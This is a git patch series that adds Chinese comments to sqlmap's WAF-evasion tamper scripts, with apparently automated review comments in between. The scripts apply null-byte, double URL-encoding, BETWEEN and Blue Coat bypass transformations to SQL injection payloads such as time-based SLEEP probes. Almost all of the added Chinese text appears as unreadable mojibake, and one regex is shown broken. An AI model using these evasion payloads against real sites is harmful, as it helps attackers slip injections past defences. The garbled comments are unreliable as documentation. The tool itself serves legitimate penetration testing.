@@ -7,17 +7,29 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): + """ + 杩欎釜鍑芥暟鐢ㄤ簬瀹氫箟渚濊禆鍏崇郴锛屼絾鍦ㄥ綋鍓嶈剼鏈腑鏈疄鐜颁换浣曞姛鑳姐 + 閫氬父锛岃繖涓嚱鏁扮敤浜庢鏌ュ綋鍓嶅嚱鏁版墍闇鐨勪緷璧栨槸鍚︽弧瓒炽 + """ pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫崟寮曞彿瀛楃锛'锛夋浛鎹负鍏堕潪娉曠殑鍙孶nicode缂栫爜瀵瑰簲鐗┿ + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负%00%27锛岃繖鏄竴绉嶉潪娉曠殑Unicode缂栫爜鏂瑰紡锛岀敤浜庣粫杩囨煇浜涘畨鍏ㄩ槻鎶ゆ帾鏂姐 - >>> tamper("1 AND '1'='1") - '1 AND %00%271%00%27=%00%271' + 绀轰緥锛 + >>> tamper("1 AND '1'='1") + '1 AND %00%271%00%27=%00%271' """ - return payload.replace('\'', "%00%27") if payload else payload + return payload.replace('\'', "%00%27") if payload else payload # 鏇挎崲payload涓殑鍗曞紩鍙蜂负%00%27 diff --git a/src/sqlmap-master/tamper/appendnullbyte.py b/src/sqlmap-master/tamper/appendnullbyte.py index 5fda08b..2493e70 100644 --- a/src/sqlmap-master/tamper/appendnullbyte.py +++ b/src/sqlmap-master/tamper/appendnullbyte.py 
@@ -15,23 +15,30 @@ __priority__ = PRIORITY.LOWEST def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) - + # 鏄剧ず璀﹀憡淇℃伅锛屾寚鍑鸿tamper鑴氭湰浠呴傜敤浜嶮icrosoft Access鏁版嵁搴 def tamper(payload, **kwargs): """ - Appends (Access) NULL byte character (%00) at the end of payload + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍦ㄦ湯灏炬坊鍔犱竴涓狽ULL瀛楄妭锛%00锛夈 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 鍦╬ayload鐨勬湯灏炬坊鍔犱竴涓狽ULL瀛楄妭锛%00锛夛紝杩欏湪瀵逛粯鏌愪簺寮盬eb搴旂敤闃茬伀澧欐椂闈炲父鏈夌敤锛岀壒鍒槸褰撳悗绔暟鎹簱绠$悊绯荤粺鏄疢icrosoft Access鏃躲 - Requirement: - * Microsoft Access + 瑕佹眰锛 + * 浠呴傜敤浜嶮icrosoft Access鏁版嵁搴撱 - Notes: - * Useful to bypass weak web application firewalls when the back-end - database management system is Microsoft Access - further uses are - also possible + 娉ㄦ剰锛 + * 杩欑鎶鏈櫎浜嗗彲浠ョ粫杩嘩eb搴旂敤闃茬伀澧欏锛岃繕鏈夊叾浠栧彲鑳界殑鐢ㄩ斻 - Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection + 鍙傝冮摼鎺ワ細 + * http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection - >>> tamper('1 AND 1=1') - '1 AND 1=1%00' + 绀轰緥锛 + >>> tamper('1 AND 1=1') + '1 AND 1=1%00' """ - return "%s%%00" % payload if payload else payload + return "%s%%00" % payload if payload else payload # 濡傛灉payload涓嶄负绌猴紝鍒欏湪鍏舵湯灏炬坊鍔燦ULL瀛楄妭锛%00锛 From 7486672d56bac2a2e348b2711bc68ac719e9a16e Mon Sep 17 00:00:00 2001 
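Review bot: The blank line that separated `dependencies()` from `def tamper(payload, **kwargs):` is replaced by an indented comment, so the function now ends on a comment and the next top-level `def` follows with no blank line; the comment also describes the `singleTimeWarnMessage(...)` call but comes after it. Move it above the call and restore the separator: `    # warn once that this tamper only makes sense against Microsoft Access` on the line before `singleTimeWarnMessage(...)`, then the blank line before `def tamper`. The rewritten Notes keep the original's vague "further uses are also possible"; if nothing concrete is known, dropping that sentence is clearer than translating it.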
From: sck <2238502556@qq.com> Date: Thu, 26 Dec 2024 08:30:37 +0800 Subject: [PATCH 5/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/base64encode.py | 24 ++++++--- src/sqlmap-master/tamper/between.py | 52 ++++++++++--------- src/sqlmap-master/tamper/binary.py | 43 +++++++-------- src/sqlmap-master/tamper/bluecoat.py | 38 +++++++++----- src/sqlmap-master/tamper/chardoubleencode.py | 35 +++++++------ src/sqlmap-master/tamper/charencode.py | 49 ++++++++++------- src/sqlmap-master/tamper/charunicodeencode.py | 48 +++++++++++------ src/sqlmap-master/tamper/charunicodeescape.py | 37 ++++++++----- 8 files changed, 196 insertions(+), 130 deletions(-) diff --git a/src/sqlmap-master/tamper/base64encode.py b/src/sqlmap-master/tamper/base64encode.py index 9e81dc9..ff35fd2 100644 --- a/src/sqlmap-master/tamper/base64encode.py +++ b/src/sqlmap-master/tamper/base64encode.py 
@@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.convert import encodeBase64 -from lib.core.enums import PRIORITY +from lib.core.convert import encodeBase64 # 瀵煎叆Base64缂栫爜鍑芥暟 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOW +__priority__ = PRIORITY.LOW # 璁剧疆浼樺厛绾т负浣 def dependencies(): pass def tamper(payload, **kwargs): - """ - Base64-encodes all characters in a given payload + """ + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁繘琛孊ase64缂栫爜銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 瀵硅緭鍏ョ殑payload杩涜Base64缂栫爜锛岃繖鍙互鐢ㄤ簬缁曡繃鏌愪簺瀵圭壒娈婂瓧绗︽湁闄愬埗鐨勫畨鍏ㄩ槻鎶ゆ帾鏂姐 - >>> tamper("1' AND SLEEP(5)#") - 'MScgQU5EIFNMRUVQKDUpIw==' + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + 'MScgQU5EIFNMRUVQKDUpIw==' """ - return encodeBase64(payload, binary=False) if payload else payload + return encodeBase64(payload, binary=False) if payload else payload # 濡傛灉payload涓嶄负绌猴紝鍒欏鍏惰繘琛孊ase64缂栫爜锛宐inary=False琛ㄧず缁撴灉涓篈SCII瀛楃涓 diff --git a/src/sqlmap-master/tamper/between.py b/src/sqlmap-master/tamper/between.py index d07e224..41fd980 100644 --- a/src/sqlmap-master/tamper/between.py +++ b/src/sqlmap-master/tamper/between.py 
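Review bot: The hunk removes the docstring opener `    """` and re-adds a visually identical `    """`, which in a text diff almost always means trailing whitespace was introduced on that line; strip it so only the intended text changes (`git diff --check` would flag it). The trailing comment on `return encodeBase64(payload, binary=False) if payload else payload  # ...` roughly doubles the line; put the explanation on its own line above the `return`. That comment also asserts that `binary=False` makes the result an ASCII string — `encodeBase64` lives in `lib.core.convert`, outside this diff, so check its signature before committing that as fact, or phrase it as `# binary=False: see encodeBase64 for the return type`.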
@@ -16,44 +16,46 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>锛夋浛鎹负'NOT BETWEEN 0 AND #'锛屽皢绛変簬鎿嶄綔绗︼紙'='锛夋浛鎹负'BETWEEN # AND #'銆 - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + 娴嬭瘯鎯呭喌锛 + * 寰蒋 SQL Server 2005 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The BETWEEN clause is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('1 AND A > B--') - '1 AND A NOT BETWEEN 0 AND B--' - >>> tamper('1 AND A = B--') - '1 AND A BETWEEN B AND B--' - >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') - '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' + 娉ㄦ剰锛 + * 杩欎釜鏇挎崲寰堟湁鐢紝鍙互缁曡繃閭d簺鍙繃婊ゅぇ浜庡瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欍 + * BETWEEN瀛愬彞鏄疭QL鏍囧噯銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庢墍鏈夋暟鎹簱銆 + + 绀轰緥锛 + >>> tamper('1 AND A > B--') + '1 AND A NOT BETWEEN 0 AND B--' + >>> tamper('1 AND A = B--') + '1 AND A BETWEEN B AND B--' + >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') + '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' """ - retVal = payload - if payload: + retVal = payload # 鍒濆鍖栬繑鍥炲 + + if payload:# 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧苟鏇挎崲澶т簬鎿嶄綔绗︼紙'>锛 match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍖归厤椤 else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 
鏇挎崲澶т簬鎿嶄綔绗 - if retVal == payload: + if retVal == payload: # 濡傛灉杩斿洖鍊兼湭鏀瑰彉锛屽皾璇曟浛鎹㈢瓑浜庢搷浣滅锛'=锛 match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) - if match: + if match:# 濡傛灉鎵惧埌鍖归厤椤 _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _)# 鏇挎崲鍖归厤椤 + - return retVal + return retVal# 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/binary.py b/src/sqlmap-master/tamper/binary.py index b0151a3..023047f 100644 --- a/src/sqlmap-master/tamper/binary.py +++ b/src/sqlmap-master/tamper/binary.py 
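Review bot: The translated note on the BETWEEN clause drops the original's `(?)` qualifier from "should work against all (?) databases", turning a hedge into a claim while the Tested-against list right above it still names only SQL Server 2005, MySQL 4/5.0/5.5, Oracle 10g and PostgreSQL 8.3–9.0; keep the qualifier, or say "against any DBMS that supports BETWEEN". In the summary line the greater-than operator is quoted as `'>` with no closing quote, while the equals operator right after it is written `'='`; make them match. The comments appended to the `re.search`/`re.sub` lines push them well past any sensible width; placing each comment on the line above its statement, as the hunk already does for the first `re.search`, keeps the regexes readable.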
@@ -16,28 +16,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Injects keyword binary where possible - - Requirement: - * MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') - '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' - >>> tamper('1 AND 2>1') - '1 AND binary 2>binary 1' - >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') - 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屾敞鍏ySQL涓殑鍏抽敭瀛'binary'锛屼互灏濊瘯缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 + + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') + '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' + >>> tamper('1 AND 2>1') + '1 AND binary 2>binary 1' + >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') + 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 - if payload: - retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) - retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) - retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) - retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) - retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) + if payload: # 濡傛灉payload涓嶄负绌 + retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 鏇挎崲NULL涓篵inary NULL + retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 鍦═HEN鍜孍LSE鍚庣殑鏁板瓧鎴栧崄鍏繘鍒跺煎墠娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 鍦ㄦ暟瀛楁瘮杈冩搷浣滀腑娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 鍦ˋND鎴朞R鏉′欢鍚庣殑鏁板瓧鍓嶆坊鍔燽inary鍏抽敭瀛 + retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 
鍦ㄦ瘮杈冩搷浣滅鍓嶇殑鏁板瓧鍓嶆坊鍔燽inary鍏抽敭瀛 + retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) # 鍦ㄥ崄鍏繘鍒跺煎墠娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 绉婚櫎澶氫綑鐨刡inary鍏抽敭瀛 - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/bluecoat.py b/src/sqlmap-master/tamper/bluecoat.py index 7438d30..46e34e5 100644 --- a/src/sqlmap-master/tamper/bluecoat.py +++ b/src/sqlmap-master/tamper/bluecoat.py @@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re# 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 瀵煎叆鐭ヨ瘑搴擄紙鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅锛 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): 
@@ -17,34 +18,45 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鏇挎崲绌烘牸瀛楃鍜岀瓑鍙锋潵缁曡繃Blue Coat SGOS鐨刉AF銆 - Requirement: - * Blue Coat SGOS with WAF activated as documented in - https://kb.bluecoat.com/index?page=content&id=FAQ2147 + 鍔熻兘锛 + * 灏哠QL璇彞鍚庣殑绌烘牸鏇挎崲涓烘湁鏁堢殑闅忔満绌虹櫧瀛楃銆 + * 灏嗙瓑鍙凤紙=锛夋浛鎹负LIKE鎿嶄綔绗︺ - Tested against: + 瑕佹眰锛 + * Blue Coat SGOS锛屼笖WAF宸叉縺娲伙紝鍙傝冩枃妗o細https://kb.bluecoat.com/index?page=content&id=FAQ2147 + + 娴嬭瘯鎯呭喌锛 * MySQL 5.1, SGOS - Notes: - * Useful to bypass Blue Coat's recommended WAF rule configuration + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃Blue Coat鎺ㄨ崘鐨刉AF瑙勫垯閰嶇疆寰堟湁鐢ㄣ - >>> tamper('SELECT id FROM users WHERE id = 1') - 'SELECT%09id FROM%09users WHERE%09id LIKE 1' + 绀轰緥锛 + >>> tamper('SELECT id FROM users WHERE id = 1') + 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ def process(match): + """ + 杈呭姪鍑芥暟锛岀敤浜庡鐞嗘鍒欏尮閰嶇殑缁撴灉銆 + 灏嗗尮閰嶅埌鐨凷QL鍏抽敭瀛楁浛鎹负甯︽湁%09锛堝埗琛ㄧ锛夌殑鐗堟湰銆 + """ word = match.group('word') if word.upper() in kb.keywords: return match.group().replace(word, "%s%%09" % word) else: return match.group() - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 if payload: + # 鏇挎崲SQL鍏抽敭瀛楀悗璺熼潪鍗曡瘝瀛楃鎴栧瓧绗︿覆鏈熬鐨勭┖鏍 retVal = re.sub(r"\b(?P[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) + # 灏嗙瓑鍙锋浛鎹负LIKE鎿嶄綔绗 retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + # 绉婚櫎澶氫綑鐨%09绌烘牸 retVal = retVal.replace("%09 ", "%09") return retVal diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py index ea711b4..6e032fc 100644 --- a/src/sqlmap-master/tamper/chardoubleencode.py +++ b/src/sqlmap-master/tamper/chardoubleencode.py 
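Review bot: The comment added above the first substitution says it replaces the space after a SQL keyword, but `re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)` does not touch the space: `process` returns `match.group().replace(word, "%s%%09" % word)`, i.e. it appends `%09` after each keyword found in `kb.keywords`, the lookahead consumes nothing, and the following space is only removed two lines later by `retVal.replace("%09 ", "%09")`. Suggested wording: `# append %09 after every SQL keyword (see process); the trailing space is dropped below` on the first, and `# collapse "%09 " so the tab replaces the space instead of preceding it` on the last. The named group is shown here as `(?P[A-Z_]+)`, which is not a valid pattern; since `match.group('word')` expects a group named `word`, this looks like the `<word>` tag being lost in rendering rather than in the commit, but give the actual file a glance.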
@@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插鐞嗘ā鍧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): @@ -16,27 +17,31 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍙岄噸URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Notes: - * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset + 娉ㄦ剰锛 + * 杩欎釜鎶鏈緢鏈夌敤锛屽彲浠ョ粫杩囦竴浜涗笉杩涜鍙岄噸URL瑙g爜鐨勫急Web搴旂敤闃茬伀澧欍 - >>> tamper('SELECT FIELD FROM%20TABLE') - '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM%20TABLE') + '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 - if payload: - retVal = "" - i = 0 - while i < len(payload): + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + + while i < len(payload): # 閬嶅巻payload涓殑姣忎釜瀛楃 + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜鍙岄噸缂栫爜 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += '%%25%s' % payload[i + 1:i + 3] - i += 3 + i += 3 # 绉诲姩绱㈠紩锛岃烦杩囧凡澶勭悊鐨勪笁涓瓧绗 else: + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛屽弻閲峌RL缂栫爜 retVal += '%%25%.2X' % ord(payload[i]) - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/charencode.py b/src/sqlmap-master/tamper/charencode.py index 181f978..6806af2 100644 
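Review bot: This patch's `index ea711b4..6e032fc` for chardoubleencode.py starts from the same blob `ea711b4` that patch 1/9 already changed to `e4eb824` by inserting `# 导入 Python 的 string 模块...` after `import string`, and the first hunk here rewrites that same `import string` line with a blank-line context that no longer exists after 1/9, so applying the series in order will fail on this hunk. Rebase 5/9 onto 1/9, or squash the one-line 1/9 into it, so the file ends up with a single comment on `import string` rather than two. In the second hunk the docstring translation keeps the doctest but loses the original summary example `(e.g. SELECT -> %2553%2545%254C%2545%2543%2554)`; keep the English one-liner above the translation. Comment placement also varies within the hunk (`i += 3  # ...` inline, the `if` explanation on its own line); pick one convention.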
--- a/src/sqlmap-master/tamper/charencode.py +++ b/src/sqlmap-master/tamper/charencode.py 
@@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插父閲忓簱锛岀敤浜庡鐞嗗瓧绗﹀拰鍗佸叚杩涘埗鏁板瓧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): pass def tamper(payload, **kwargs): """ - URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Tested against: + 鍔熻兘锛 + * 灏嗚緭鍏ョ殑SQL璇彞涓殑鎵鏈夊瓧绗﹁繘琛孶RL缂栫爜銆 + * 渚嬪锛屽皢'SELECT'杞崲涓'%53%45%4C%45%43%54'銆 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS + 娉ㄦ剰锛 + * 杩欎釜鏂规硶瀵逛簬缁曡繃涓浜涢潪甯稿急鐨刉eb搴旂敤闃茬伀澧欏緢鏈夌敤锛岃繖浜涢槻鐏鍦ㄥ鐞嗚姹傛椂涓嶈繘琛孶RL瑙g爜銆 + * Web鏈嶅姟鍣ㄤ細浼犻掕В鐮佸悗鐨勭増鏈紝鍥犳搴旇閫傜敤浜庝换浣曟暟鎹簱绠$悊绯荤粺锛圖BMS锛夈 - >>> tamper('SELECT FIELD FROM%20TABLE') - '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM%20TABLE') + '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ - retVal = payload - if payload: - retVal = "" - i = 0 + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 妫鏌ュ綋鍓嶅瓧绗︽槸鍚︿负%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 + retVal += payload[i:i + 3] # 濡傛灉鏄凡缂栫爜鐨勫瓧绗︼紝鐩存帴娣诲姞鍒拌繑鍥炲 + i += 3 # 
绉诲姩绱㈠紩锛岃烦杩囧凡澶勭悊鐨勪笁涓瓧绗 else: - retVal += '%%%.2X' % ord(payload[i]) - i += 1 + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶RL缂栫爜锛屽苟娣诲姞鍒拌繑鍥炲 + retVal += '%%%.2X' % ord(payload[i])# 灏嗗瓧绗﹁浆鎹负鍏禔SCII鍊肩殑鍗佸叚杩涘埗琛ㄧず + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 + - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/charunicodeencode.py b/src/sqlmap-master/tamper/charunicodeencode.py index 6e8b429..c8f72ce 100644 --- a/src/sqlmap-master/tamper/charunicodeencode.py +++ b/src/sqlmap-master/tamper/charunicodeencode.py 
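Review bot: Two inline comments in this hunk are glued to the code with no separating whitespace, `__priority__ = PRIORITY.LOWEST# …` and `retVal += '%%%.2X' % ord(payload[i])# …`; PEP 8 (E261) asks for at least two spaces before an inline `#`, so these should read `__priority__ = PRIORITY.LOWEST  # …` and `retVal += '%%%.2X' % ord(payload[i])  # …`. The hunk also introduces an empty `+` line between `i += 1` and `return retVal` that the original did not have. Since the neighbouring `retVal += payload[i:i + 3] # …` line in the same hunk uses a spaced form, the glued ones look like slips rather than a deliberate style.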
@@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission import os import string -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST # 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): + """ + 杩欎釜鍑芥暟鐢ㄤ簬鍦ㄨ繍琛屾椂妫鏌ヤ緷璧栧叧绯伙紝骞剁粰鍑鸿鍛婁俊鎭 + + 鍔熻兘锛 + - 鏄剧ず涓鏉″崟娆¤鍛婃秷鎭紝鎸囧嚭褰撳墠鐨則amper鑴氭湰浠呴傜敤浜嶢SP鎴朅SP.NET Web搴旂敤绋嬪簭銆 + """ singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): """ - Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) + 